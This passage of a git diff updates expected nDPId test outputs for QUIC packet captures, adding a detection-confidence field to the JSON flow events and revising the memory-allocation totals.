+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434507,"flow_last_seen":1603816444490,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434765,"flow_last_seen":1603816435194,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434648,"flow_last_seen":1603816434782,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":643,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00167{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","total-events-serialized":399}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 246/246
@@ -405,9 +405,9 @@
 ~~ total active/idle flows...: 77/77
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5036795 bytes
-~~ total memory freed........: 5036795 bytes
-~~ total allocations/frees...: 100783/100783
+~~ total memory allocated....: 5096820 bytes
+~~ total memory freed........: 5096820 bytes
+~~ total allocations/frees...: 102373/102373
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 172 chars
 ~~ json string max len.......: 2158 chars
diff --git a/test/results/quic_q39.pcap.out b/test/results/quic_q39.pcap.out
index 949f3ecc8..4533f2085 100644
--- a/test/results/quic_q39.pcap.out
+++ b/test/results/quic_q39.pcap.out
@@ -1,10 +1,10 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_q39.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1509098995610,"flow_last_seen":1509098995610,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1509098995610,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1509098995610,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1509098995610,"pkt":"AAAAPJ7rSEb7OSWDCABFAAVipylAAD8RBjiq2BDRFZ2345bcAbsFTtxhDeca1dd1bE1NUTAzOQFpm58AnJnQaHUqfgGgAQQAQ0hMTxsAAABQQUQA1AEAAFNOSQDhAQAAU1RLABcCAABWRVIAGwIAAENDUwArAgAATk9OQ0sCAABNU1BDTwIAAEFFQURTAgAAVUFJRIACAABTQ0lEkAIAAFRDSUSUAgAAUERNRJgCAABTTUhMnAIAAElDU0ygAgAAQ1RJTagCAABOT05QyAIAAFBVQlPoAgAATUlEU+wCAABTQ0xT8AIAAEtFWFP0AgAAWExDVPwCAABDU0NU\/AIAAENPUFT8AgAAQ0NSVBQDAABJUlRUGAMAAENGQ1ccAwAAU0ZDVyADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zLnlvdXR1YmUuY29tHmY9ku1OY40wxAcfyyHFWACuKRu9GR6V2xdJs\/1DZWDRgILbvi6YPymdOys8LmRShvdEmFTSUTAzOQHogWCSkhrofu2AhqIVgpFZ8wXyMDAwMDAwMDBOGwyq+nKlq\/7gyjM9fK1HfmcRm2QAAABBRVNHY29tLmdvb2dsZS5hbmRyb2lkLnlvdXR1YmUgQ3JvbmV0LzYzLjAuMzIyMy43EbUkNcc61MtqjsJrlOUgFgAAAABYNTA5AQAAAB4AAADyBfNZAAAAAJSFXrmNCzW2XCwCM6DbC32c2YfxELPjjStDUbaq7wmHTyY4LQBCW\/iNJqUlz2Wd46tERlhzvdEC41udof7lNxBkAAAAAQAAAEMyNTVDwyMTjfiB70PDIxON+IHvmpHtbxwAgQ5AC3uQqa5564NqFQAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1509098995610,"flow_last_seen":1509098995610,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1509098995610,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.youtube.com","user_agent":"com.google.android.youtube Cronet\/63.0.3223.7"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1509098995610,"flow_last_seen":1509098995610,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1509098995610,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.youtube.com","user_agent":"com.google.android.youtube Cronet\/63.0.3223.7"}}
 01972{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1509098995619,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1174,"pkt_l4_len":1140,"ts_msec":1509098995619,"pkt":"AAAAPJ7rSEb7OSWDCABFAASIpypAAD8RBxGq2BDRFZ2345bcAbsEdFQcDeca1dd1bE1NUTAzOQJfXHZ4r4NHY5hNEdjLP+5ayCAfN4aRrJwcGbvr9Ig30\/shURCI87o6EE5x2r0qaxNPy9ijcArYvwm83T\/uUNOwvPrQL1kQ63P7NcdMjvNaDrlFf0DGfuOc7NBPTTXBkaePu98lEtAf3wsOApXg5IhtfmWdfKrgEpCXWFWsxttw6C4\/lCwJqkUGaOjHW5OhnY9r8qCDBdkX4XN\/4WmFW6nWq\/XYAKSy+w3zKPd0+LJKlxsYwrzgGV2rjQwmb93iv1FFvCzNy4lqNoUoMblenytDJV5TJvGYH4s+\/7AX7HDhbJj+lIeaRA3g7dV3H3kgoU\/SpbsdOzy0YVY6Bp9yZermraiyHURn7bAotygD2Vp7YwNcdNEG9BU3funEay5GDjyBK1j66ZDJgNXirLZjzse1+VcJnT0WzMubicwvU30jDw+McSt9Bti6\/gP9FAz9\/lD31IeL8vackSc4lx75mviO5HS6BA\/NqsjQ9B8m4Ji2diYR80xUpIbgdFQiU+oifhm6+LGlaffXf5zfdWBFidIfld\/b7JT3SCK0xn1oi2TKxI8Oroqc4ijms7JGelhl0fef2CpmP0WCIT2YgyU6YwvWa1W7lII+N1ZbTeUAByGqF1QhTf5cSKd79GJRi+dbNY7B3Wj4KJv9v8GAF7TKwPiEZdDEpbOPHL\/FjvVpM04y5hU8HR+06oyFgTK1\/6hdbKNXNH9cJjr2nmUmezntPWc2AFfXM+e\/7E1fv7zcT4Kq1YOLXr9\/RjJvDNQoj81czTWLgfREm6KUrj\/r6fSbFJFnhuScfBlR9k2Pc7b3lIEZb0KXGhxHCyB1J7D8gUoqDhJYFGV+VkGVNhJpozvYPJ8ykH\/Y41HD8nsSDL9iDj9URAxCKHefDlX7Pwz6OhBfkcIZAyY3zG\/w9rr4x0Pl7U6qcsdZ1MBpDJ9qjugA+Tt8C4JpvLxNAR0kx92LyFnt3BYr58WDPwTbktI01oxzKDO5QfY46azjmnqJ+Or2LI93bDxwCMYKsLGAmehhGKZad4Iy8CQig4MBQDG0NMhHKAI6+BaplljmUnDnEalyg57\/03tWWLR4CQIYoKQ9N\/\/fDmFtkFJjraB0A767qxG7Cy8Linc3qzCa86538v6kM371bSCg\/XlL+EWzVEgq8MNOp+Kf2xPBIqWXFiVMGJ1GcpQwm6iQItRpY+85J5+RUK5X+3OW5ex3EYIjJUr+g2x3sFkDiuAsaRHgrjj6WnNpOZnghw1uaYp+E3H8VPrRSwSKqch7lieJx+ojtBtD\/W9etVSxGJeGD7lz+4wIhuht4d\/jcmgefkRDKcrraaR9azCKs\/kbJ\/PpVxbRsVvTZyAXgG+ABf\/0Dt+UshFkLro\/tuKww4FrErwElInQ+88Azyk3w8tcu1AYrDqSPj2BvjSRVwl0PO7TtbVWqgcuYET3exljbs22Rr5eyEoiPXhNZMDC79zLn441b43FrUKvwSHTJR\/j33VYKbaP4oVCvb26Vw=="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1509098995647,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1509098995647,"pkt":"AAAAPJ7rSEb7OSWDCABFAAA\/AABAADgRuYQVnbfjqtgQ0QG7ltwAKyQ\/COca1dd1bE1NATKbKH1UbNEn\/TIU5EABJEsBAQAAAAANBgA="}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1509098995610,"flow_last_seen":1509099044559,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":21651,"flow_avg_l4_payload_len":360,"midstream":0,"ts_msec":1509099044559,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1509098995610,"flow_last_seen":1509099044559,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":21651,"flow_avg_l4_payload_len":360,"midstream":0,"ts_msec":1509099044559,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"quic_q39.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 60/60
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596615 bytes
-~~ total memory freed........: 4596615 bytes
-~~ total allocations/frees...: 99614/99614
+~~ total memory allocated....: 4681568 bytes
+~~ total memory freed........: 4681568 bytes
+~~ total allocations/frees...: 101204/101204
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 2240 chars
diff --git a/test/results/quic_q43.pcap.out b/test/results/quic_q43.pcap.out
index 2e055a8f1..9598f3f8c 100644
--- a/test/results/quic_q43.pcap.out
+++ b/test/results/quic_q43.pcap.out
@@ -1,9 +1,9 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_q43.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388060203,"flow_last_seen":1592388060203,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1592388060203,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388060203,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1592388060203,"pkt":"AAAAAAAAAA0A1ZJ\/CABFAAVitYFAAD8RFzMzeBTKSHfZHcBZAbsFTg3gDeg8d72PiRX5UTA0MwHUpsx5z1djkhIB1MqgAQQAQ0hMTxgAAABQQUQAKAIAAFNOSQA2AgAAU1RLAGwCAABWRVIAcAIAAENDUwCAAgAATk9OQ6ACAABBRUFEpAIAAFNDSUS0AgAAVENJRLgCAABQRE1EvAIAAFNNSEzAAgAASUNTTMQCAABOT05Q5AIAAFBVQlMEAwAATUlEUwgDAABTQ0xTDAMAAEtFWFMQAwAAWExDVBgDAABDU0NUGAMAAENPUFQcAwAAQ0NSVCwDAABJUlRUMAMAAENGQ1c0AwAAU0ZDVzgDAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1kbnMuZ29vZ2xlLmNvbR8ykEILcj\/tFGrck4XfPyIJIy1Wp2EOyj96Sbv5OxbQ7GtzdqXVHstRevTu5j9sOKKoV3MEbVEwNDMB6IFgkpIa6H7tgIaiFYKRXuiYTDAwMDAwMDAwL8w4xnPBiaheNE18yX+i9poR99hBRVNHfnKffIxl9aDtAhVkrBteYAAAAABYNTA5AQAAAB4AAADs\/0Yi1mMvJ+MeFLVM06sFxTPtG7icgHbJd6FPguzZ5DspSAr1qmJOAogGqdfyO9QJ05Fvsk1n4Zg7QCWE0DkiZAAAAAEAAABDMjU1W+x30vZEmVNOU1RQW+x30vZEmVNgMsuSoEFN3\/mAAgAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388060203,"flow_last_seen":1592388060203,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1592388060203,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google.com"}}
+00699{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388060203,"flow_last_seen":1592388060203,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1592388060203,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google.com"}}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388060251,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1592388060251,"pkt":"AAAAAAAAAAoAtmi7CABFAAA6AABAADsR1dxId9kdM3gUygG7wFkAJsU\/COg8d72PiRX5AdVtByTcf3A7ZqGOSkABJDYBAAYA"}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1592388060203,"flow_last_seen":1592388060251,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1380,"flow_avg_l4_payload_len":690,"midstream":0,"ts_msec":1592388060251,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1592388060203,"flow_last_seen":1592388060251,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1380,"flow_avg_l4_payload_len":690,"midstream":0,"ts_msec":1592388060251,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","total-events-serialized":7}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2/2
@@ -13,9 +13,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594887 bytes
-~~ total memory freed........: 4594887 bytes
-~~ total allocations/frees...: 99555/99555
+~~ total memory allocated....: 4679840 bytes
+~~ total memory freed........: 4679840 bytes
+~~ total allocations/frees...: 101145/101145
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
 ~~ json string max len.......: 2240 chars
diff --git a/test/results/quic_q46.pcap.out b/test/results/quic_q46.pcap.out
index 0588f433c..f004874ed 100644
--- a/test/results/quic_q46.pcap.out
+++ b/test/results/quic_q46.pcap.out
@@ -1,10 +1,10 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_q46.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559632338055,"flow_last_seen":1559632338055,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1559632338055,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02240{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559632338055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1559632338055,"pkt":"AAAAAAAAAAAA4JDHCABFAAVic3hAAD8RmymsHSrsmRS3y5WUAbsFTk\/Qw1EwNDZQ6s\/m5wbfJy0AAAAEYNpYkp9oOdCGDvxYpAEEAAQAQ0hMTxoAAABQQUQAtgEAAFNOSQDFAQAAU1RLAP0BAABTTk8AMQIAAFZFUgA1AgAAQ0NTAEUCAABOT05DZQIAAEFFQURpAgAAVUFJRJQCAABTQ0lEpAIAAFRDSUSoAgAAUERNRKwCAABTTUhMsAIAAElDU0y0AgAATk9OUNQCAABQVUJT9AIAAE1JRFP4AgAAU0NMU\/wCAABLRVhTAAMAAFhMQ1QIAwAAQ1NDVAgDAABDT1BUDAMAAENDUlQcAwAASVJUVCADAABDRkNXJAMAAFNGQ1coAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0